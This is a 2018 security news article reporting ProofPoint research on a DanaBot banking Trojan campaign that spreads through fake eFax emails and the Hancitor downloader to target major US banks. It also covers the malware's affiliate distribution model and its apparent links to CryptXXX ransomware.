The DanaBot banking Trojan traditionally ran campaigns that targeted Australia and European banks, but new research shows a new campaign that is targeting banks in the United States as well.
DanaBot is a modular Trojan written in Delphi that attempts to steal account credentials and information from online banking sites. It does this through a variety of methods such as taking screenshots of active screens, stealing form data, or logging keystrokes made on the computer. This stolen information is then collected and sent back to a central server, or command & control server, where it can then be accessed by the attackers.
When ProofPoint first discovered DanaBot, a single group was using it to target Australian banks. As time went on, other actors began using the banking Trojan to target other regions. As more campaigns are released using a different ID found in server communications, ProofPoint feels that DanaBot is being marketed as part of an affiliate system where actors can either share in the profits or rent the malware from the developer.
The North American campaign discovered by ProofPoint is being spread through malspam that pretends to be digital faxes from eFax. These emails state that the recipient received a fax and then prompts the user to download them.
When the recipient clicks on the download button, they will download a malicious Word document that pretends to be the eFax. When opened, the document will instruct the users to click on the "Enable Content" button to properly view it.
Once a user clicks on the Enable Content button, Word macros will fire off and download and install Hancitor on the victim's machine. Hancitor will then download DanaBot and other malware, such as Pony, onto the computer.
According to security researcher TomasP the U.S. based targeted by this new DanaBot campaign include Bank of America, Wells Fargo, TD Bank, Royal Bank, and JP Morgan Chase.
#Danabot meets America...— TomasP (@0xE9FBFFFFFF) October 1, 2018
North American banks freshly added to a new Danabot config:
ProofPoint has been tracking the various campaigns that are utilizing DanaBot and have identified 9 different actors distributing the Trojan. These actors are being identified by an "affiliate id" that is part of the C2 communication header.
For the most part, each actor distributes DanaBot to a specific region, with only Australia being the target of two different affiliate ids. Furthermore, each affiliate id is utilizing different distribution methods such as web injects, the Fallout Exploit Kit, various malspam campaigns, and as in the current campaign, installations through the Hancitor malware.
In addition to an affiliate system being used, ProofPoint has found similarities between how DanaBot and the CryptXXX Ransomware communicate with their respective command & control servers. This leads the researchers to believe that the developers created DanaBot as part of an evolution of CryptXXX.
"Thus it would seem that Danabot follows in a long line of malware from one particular group," stated the ProofPoint report. "This family began with ransomware, to which stealer functionality was added in Reveton. The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot."
10/3/18: Updated to include list of targeted U.S. banks